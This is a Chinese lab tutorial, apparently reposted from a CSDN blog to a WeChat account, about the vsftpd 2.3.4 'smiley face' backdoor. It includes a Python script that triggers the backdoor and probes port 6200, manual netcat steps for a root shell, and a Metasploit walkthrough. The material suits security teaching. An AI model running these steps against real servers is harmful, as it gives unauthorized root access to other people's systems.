扫码领资料
获黑客教程
免费&进群
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;
当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。
环境搭建
攻击机(本机):192.168.1.3
靶机(metaspolit2):192.168.1.5
nmap进行漏洞检测
python脚本进行漏洞检测
代码如下:
import socket
from ftplib import FTP
url = input("请输入你需要检测的地址:")
ftp = FTP()
username = 'root:)' #用户名必须包含:)这两个字符
password = 'anonymous' #密码随便啥都行
try:
ftp.connect(url,21,timeout=10)#使用ftp登录,设置延时10秒
ftp.login(username,password)
ftp.quit()
except:
print("完成登录检测")
try:
s = socket.socket() #使用socket函数来检测是否有漏洞存在
s.connect((url,6200))
s.close()
print("存在微笑漏洞")
except:
print("没有发现笑脸漏洞!")
输出结果:
(一)使用nc进行漏洞利用
1、打开命令行登录ftp服务器,在用户名处输入xiaofeng:)然后随意输入一个
密码回车等待,紧接着进行下一步:
2、打开一个新窗口,输入nc 目标ip 6200 即可连接。
(二)使用msf进行漏洞利用
-
打开MSFConsole搜索vsftpd_234并使用
2. 设置攻击目标,进行exploit即可获取shell。
作者:CSDN博主「xiaochuhe.」
原文链接:https://blog.csdn.net/xiaofengdada/article/details/122693486
声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本号及原作者不承担相应的后果.
学习更多渗透技能!体验靶场实战练习
(hack视频资料及工具)
(部分展示)
往期推荐
原文始发于微信公众号(白帽子左一):python脚本检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论